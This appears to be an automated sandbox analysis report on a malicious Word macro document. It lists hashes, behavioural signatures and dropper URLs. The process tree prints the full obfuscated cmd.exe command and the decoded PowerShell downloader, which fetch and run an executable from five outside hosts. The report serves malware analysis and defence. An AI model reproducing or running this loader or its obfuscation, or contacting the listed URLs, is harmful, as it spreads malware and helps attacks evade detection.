Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    23-05-2024 11:36

General

  • Target

    6acfc827bf70cfd4fc9cd36f66ebba6c_JaffaCakes118.doc

  • Size

    124KB

  • MD5

    6acfc827bf70cfd4fc9cd36f66ebba6c

  • SHA1

    cb32b63048a1368cceb3a2114ca6fe640ee440cd

  • SHA256

    fbb1873ef58fdcc8f875e6450150e7a378e86deb32cb3525fd23d3791bf192ad

  • SHA512

    08fe27514c28daaaa5278ab990f84a0ceaf3075eda9d157f01739de20574a30e811b610c84a0e51cc011c875005411f041d6feabf6601895c04a5738505232ec

  • SSDEEP

    1536:nptJlmrJpmxlRw99NBc+aSwT+75RnuwACdRR2XGUggBlpF7xpy7RMANuk:pte2dw99fVtRIWwYMKuk

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    • exe.dropper
      http://hollywoodgossip.biz/GpyDtTIIO1
    • exe.dropper
      http://charpentier-couvreur-gironde.com/2Agu5kOrh7
    • exe.dropper
      http://surprise-dj-team.com/2Atuefrxm
    • exe.dropper
      http://spektramaxima.com/IXx8GGy
    • exe.dropper
      http://dc.amegt.com/wp-content/QNhKWYE

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6acfc827bf70cfd4fc9cd36f66ebba6c_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2164
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1284
      • C:\Windows\SysWOW64\CMd.exe
        CMd /V/C"^s^e^t ^2Cv=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^};^k^aerb;^a^G^P^$^ ^m^e^t^I^-^ekovn^I^;)^a^G^P^$^ ^,^J^P^G^$(e^l^i^F^d^ao^ln^w^o^D^.^J^A^h^$^{^yr^t^{)^kR^a^$^ n^i^ ^JP^G^$(^hc^a^er^o^f^;'^e^x^e^.^'^+^u^i^p^$^+^'^\^'^+c^i^l^b^u^p^:vn^e^$^=^a^G^P^$^;^'^5^2^7^'^ ^=^ ^u^i^p^$^;)'^@^'(^t^i^l^p^S.^'E^Y^W^K^hN^Q/^tn^e^tn^oc^-^p^w/^m^oc^.^tg^e^m^a^.c^d//^:^p^t^t^h^@^y^G^G^8^x^X^I/^moc^.^a^m^i^x^a^m^ar^tke^ps//^:^p^t^t^h^@^m^xr^f^e^u^t^A^2/^m^oc^.^m^a^e^t^-^j^d^-^e^s^ir^pr^u^s//^:^p^t^t^h^@^7^hr^Ok^5^u^g^A^2/^m^oc^.^e^dn^or^i^g^-r^u^erv^u^oc^-r^e^i^tn^e^pr^a^hc//^:^p^t^t^h^@^1^O^I^I^Tt^D^y^p^G/^z^i^b^.^p^i^s^s^o^g^d^o^ow^y^l^l^o^h//:p^t^t^h^'^=kR^a^$^;^tn^e^i^lC^b^e^W^.^t^eN^ ^tc^e^j^b^o^-^w^en^=^J^A^h^$^ ^l^l^e^h^sr^e^w^o^p&&^f^or /^L %^3 in (^4^0^8^,^-^1^,^0)^d^o ^s^e^t n^b^T^z=!n^b^T^z!!^2Cv:~%^3,1!&&^i^f %^3=^=^0 c^a^l^l %n^b^T^z:^*n^bT^z^!^=%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:3048
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $hAJ=new-object Net.WebClient;$aRk='http://hollywoodgossip.biz/GpyDtTIIO1@http://charpentier-couvreur-gironde.com/2Agu5kOrh7@http://surprise-dj-team.com/2Atuefrxm@http://spektramaxima.com/IXx8GGy@http://dc.amegt.com/wp-content/QNhKWYE'.Split('@');$piu = '725';$PGa=$env:public+'\'+$piu+'.exe';foreach($GPJ in $aRk){try{$hAJ.DownloadFile($GPJ, $PGa);Invoke-Item $PGa;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2388

    Network

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      4b994444859fc40053f13dd5b9f38f3f

      SHA1

      ebfdac7647cdfd7fe4fe729b9fa55f382a58f198

      SHA256

      0df29eac8c3b2b5e9ad335012a5dc225bb13538782a336734c676b4cecc9e70c

      SHA512

      c5302fcb86453cb8cd9727d47fc030bc928c17a23f8815f7567ebb7282578d7fcf3804e3b5dcb2fd242759158c170e1da06186286a16dd59e4b5f70831be983b

    • memory/2164-13-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

    • memory/2164-9-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

    • memory/2164-10-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

    • memory/2164-8-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

    • memory/2164-25-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

    • memory/2164-24-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

    • memory/2164-20-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

    • memory/2164-17-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

    • memory/2164-6-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

    • memory/2164-0-0x000000002FBA1000-0x000000002FBA2000-memory.dmp

      Filesize

      4KB

    • memory/2164-59-0x0000000071A7D000-0x0000000071A88000-memory.dmp

      Filesize

      44KB

    • memory/2164-2-0x0000000071A7D000-0x0000000071A88000-memory.dmp

      Filesize

      44KB

    • memory/2164-16-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

    • memory/2164-26-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

    • memory/2164-7-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

    • memory/2164-12-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

    • memory/2164-40-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

    • memory/2164-39-0x0000000071A7D000-0x0000000071A88000-memory.dmp

      Filesize

      44KB

    • memory/2164-43-0x00000000001B0000-0x00000000002B0000-memory.dmp

      Filesize

      1024KB

    • memory/2164-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2164-58-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2388-34-0x0000000002DE0000-0x0000000002E1C000-memory.dmp

      Filesize

      240KB